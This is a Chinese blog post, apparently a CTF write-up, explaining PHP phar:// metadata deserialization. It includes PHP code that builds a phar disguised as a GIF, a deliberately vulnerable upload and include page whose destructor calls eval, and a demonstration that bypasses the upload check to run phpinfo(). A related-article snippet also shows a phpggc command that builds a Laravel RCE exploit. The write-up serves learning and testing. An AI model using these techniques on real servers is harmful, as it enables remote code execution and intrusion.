一个phar://的漏洞

最新推荐文章于 2024-04-01 21:58:12 发布
最新推荐文章于 2024-04-01 21:58:12 发布
阅读量5.7k 收藏 12
点赞数 8
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaorouji/article/details/83118619
版权

前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。
这个鬼东西就是phar://的序列化的漏洞

介绍一下

phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub

stub

就是一个标志,格式xxx<?php xxxxx; __HALT_COMPILER();?>,结尾一定是__HALT_COMPILER();?>,不然phar识别不了phar文件

举个栗子

先看一下phar怎么用

class TestObject{
}

$phar = new Phar("phar.phar");
$phar -> startBuffering();
$phar -> setStub("<?php __HALT_COMPILER();?>");
$o = new TestObject();
$o -> data = 'h4ck3r';
$phar -> setMetadata($o);
$phar -> addFromString("test.txt","test");
$phar -> stopBuffering();

执行以后同级目录下会有一个phar.phar文件,丢去二进制编辑器

嗯,没毛病,确实看到了序列化后的对象

对应的,就会有反序列化的操作,php一大部分文件系统函数在通过phar://伪协议解析的时候,都会将meta-data进行反序列化,影响函数如下

将我们上面生成的phar.phar反序列化一下

class TestObject{
    function __destruct()
    {
        echo $this->data;
    }
}

include ('phar://phar.phar');

嗯,浏览器也确实输出出来了

再来个栗子

用phar伪装一下其他文件,因为php识别phar文件是通过stub来的,那样的话我们只需要在__HALT_COMPILER();?>前面加多一个其他文件的头,就可以伪装了

来个大的示范好吧

前端的上传页面

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>ea3y_upload_file</title>
</head>
<body>
    <form action="http://localhost/ctf/phar/upload.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file" />
        <input type="submit" name="upload" />
    </form>
</body>
</html>

后台的检测页面,先限制好只能传gif

if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif') {
    echo "Upload: " . $_FILES["file"]["name"]."<br>";
    echo "Type: " . $_FILES["file"]["type"]."<br>";
    echo "Temp file: " . $_FILES["file"]["tmp_name"]."<br>";

    if (file_exists("upload_file/" . $_FILES["file"]["name"]))
    {
        echo $_FILES["file"]["name"] . " already exists. ";
    }
    else
    {
        move_uploaded_file($_FILES["file"]["tmp_name"],
            "upload_file/" .$_FILES["file"]["name"]);
        echo "Stored in: " . "upload_file/" . $_FILES["file"]["name"];
    }
}
else
{
    echo "Invalid file,you can only upload gif";
}

后台解析文件的php

$filename=$_GET['filename'];
class AnyClass{
    function __destruct()
    {
        eval($this ->data);
    }
}
include ($filename);

emmm,可以看到,类里面有个魔幻函数,同时还有一句eval,甚至还能给你一句include,没错,就是它了

自己打一个生成phar的文件

class AnyClass{
    function __destruct()
    {
        eval($this -> data);
    }
}
$phar = new Phar('phar2.phar');
$phar -> stopBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$object = new AnyClass();
$object -> data = 'phpinfo();';
$phar -> setMetadata($object);
$phar -> stopBuffering();

可以看到,stub前面已经加了gif头,类里面的参数是phpinfo,如果最后能利用的话就会输出php的信息

执行一下可以看到生成phar2.phar文件,改下后缀成gif文件,然后上传,最后访问

嗯,确实是可以看到php的信息,phar协议真的强无敌啊,轻轻松松就绕过了服务器的检测好吧,牛逼牛逼

参考:https://paper.seebug.org/680/

Xi4or0uji
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phar反序列化漏洞
Mi1k7ea
01-01 5934
之前做CTF遇到phar反序列化漏洞概念,这里小结一下,主要参考自https://paper.seebug.org/680/ 基本概念 phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本&gt;=5.3时默认开启支持PHAR文件的。 phar文件默认状态是只读,使用phar文件不需要任何的配置。 而phar://伪协议即PHP归档...
第二十三天 phar反序列化漏洞
代码审计
04-01 2207
关于这个方法在2018年 BlackHat 大会上的 Sam Thomas 分享了 File Operation Induced Unserialization via the “phar://” Stream Wrapper ,该研究员指出该方法在 文件系统函数 ( file_get_contents 、 unlink 等)参数可控的情况下,配合 phar://伪协议 ,可以不依赖反序列化函数 unserialize() 直接进行反序列化的操作。 zip rar压缩文件包 类似 默认支持phar协议的使
PHAR反序列化漏洞
kunkun_xiaomeng的博客
08-31 873
phar反序列化
php反序列化漏洞——phar反序列化漏洞
m0_73756016的博客
04-01 1211
类比java语言JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。文件包含:phar伪协议,可读取 .phar文件。
phar是啥?
09-18 792
C#可以把代码打包成dll java可以把代码打包成jar 那么凭什么PHP不可以?实际上在PHP5.3之后就出现了类似的东西叫做phar新建build.txt:<?php$phar = new Phar("test.phar"); $phar->buildFromDirectory(__DIR__.'/files','/\.php$/'); //编译files目录下的所有.php文件 $p
信息安全技术:PHP伪协议.pptx
11-01
`php://filter`是PHP的一个高级特性,它允许在打开数据流时应用过滤器。这种机制可以在读取或写入数据前进行转换,如解码、编码或验证数据。它可以用于处理`php://input`等流,以确保数据的安全性和有效性。 总的...
laravel-exploits:针对CVE-2021-3129的漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system ...
泛微E-Office10远程代码执行漏洞
最新发布
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
PHP代码审计小结1
08-03
1. **获取源码**:这是审计的第一步,获取完整的源代码以便进行全面分析。 2. **本地搭建调试**:在本地环境中复现应用,便于调试和测试潜在漏洞。 3. **把握大局**:了解网站结构、入口文件、配置文件、路由、全局...
对ShirneCMS的一次审计思路1
08-03
首先,审计过程中在`/src/extend/extcore/ImageCrop.php/crop`方法中发现了`getimagesize`函数,这是一个可能触发PHAR反序列化漏洞的函数。PHAR(PHP Archive)是一种打包PHP代码的格式,当处理不当,可以被用来执行...
composer.phar文件
01-31
Composer.phar 是 PHP 用于管理项目依赖的工具的框架,如果你已经安装了 Composer ,请直接执行 composer self-update
php phar 混淆,深入理解PHP Phar反序列化漏洞原理及利用方法(一)
weixin_35749440的博客
03-11 513
Phar反序列化漏洞是一种较新的攻击向量,用于针对面向对象的PHP应用程序执行代码重用攻击,该攻击方式在Black Hat 2018会议上由安全研究员Sam Thomas公开披露。类似于对编译二进制文件的ROP(Return-oriented Programming)攻击,这种类型的漏洞利用PHP对象注入(POI),这是面向对象的PHP代码上下文中的一种面向属性的编程(POP)。由于其新颖性,这种...
Phar反序列化漏洞原理
soldi_er的博客
06-08 396
文章目录   来自Secarma的安全研究员Sam Thomas发现,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。   
PHP的phar相关
元俊up
04-23 446
创建PHAR文件: phar官方文档 查看phar.readonly的配置。需要修改php.ini文件设置 phar.readonly=0 否则: php -i | grep phar 编辑 index.php <?php echo "This is a phar test ."; echo PHP_EOL; createPhar.php <?php $srcRoot = ...
------已搬运-------PHP反序列化之三:phar://反序列化之☞菜鸡的总结
Zero_Adam的博客
01-29 392
讲真,写道一半后悔了,,,网上说。这个好像不怎么出题。而且现实中这个漏洞也比较少。。。哭了呀,,━┳━…━┳━ (本????还没有看POP链…)看了这么多文章,先总体上说说吧。这个**phar://**只是反序列化漏洞中的一个分支。 个人理解:**phar://**之所以拿出来,单独成知识点,有一点原因就是可以不用unserialize()方法,但是仍然会调用php的反序列化。 只要有反序列化,那么就很可能有反序列化漏洞。要有反序列化漏洞,就一定要有反序列化这个步骤。可以是unserialize(),也可
phar://反序列化的利用【windows远程登录】
weixin_43821278的博客
07-16 514
前言 一、环境搭建 ​ 二、详细解释 1.phar反序列化 2.关键1 3.关键2 三、运行测试 四、总结 前言 看到CTF很多题都有关于phar://绕过文件上传配合反序列化利用的。但是实战中大概率不存在这么巧合的点。 在了解phar://时,看很多博客都是写入phpinfo()来执行的。我突发脑洞,既然可以执行phpinfo,那么可不可以写马获得shell呢? 由于对php对象不是很了解,踩了很多坑记录一下。 windows server 2008、php5.5.38、...
php和phar后缀,使用phar实现php反序列化
weixin_31948907的博客
03-10 171
前言一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerability Jim, but not as we know it,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特性,扩展php反序列化的攻击面。一般来说,文件操作都是可以触发phar反序列...
[SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】
D.MIND 的博客
04-24 1679
文章目录Phar:// 协议进行反序列化构造POP链生成phar总结: 一道不算难的反序列化+文件上传题目,但自己在构造POP链时还是愣了好久,本菜鸡名副其实了 首先是在查找文件处,URL明显是值得怀疑的file.php?file= 这按照惯例得试试能不能把一些文件读出来 一共是这些:index.php、base.php、file.php、upload_file.php、class.php upload_file.php值得关注就是这个限制了,只允许图片 在file.php中就有对象的生成 //file.
phar://伪协议
02-28
phar://伪协议是PHP中的一个特殊协议,用于访问和操作PHP归档文件(.phar文件)。.phar文件是一种将多个PHP文件打包成单个可执行文件的方式,类似于Java中的JAR文件或Python中的ZIP文件。 通过phar://伪协议,可以像操作普通文件一样对.phar文件进行读取、写入和执行等操作。使用该协议,可以方便地加载和使用.phar文件中的类、函数和资源。 以下是phar://伪协议的一些使用示例: 1. 读取.phar文件中的内容: ```php $content = file_get_contents('phar://path/to/file.phar/file.txt'); ``` 2. 执行.phar文件中的PHP脚本: ```php include 'phar://path/to/file.phar/script.php'; ``` 3. 写入内容到.phar文件中: ```php file_put_contents('phar://path/to/file.phar/newfile.txt', 'Hello, World!'); ``` 需要注意的是,为了安全起见,PHP默认情况下禁用了phar://伪协议。如果要使用该协议,需要在php.ini配置文件中启用相关选项或者在代码中使用ini_set函数进行设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值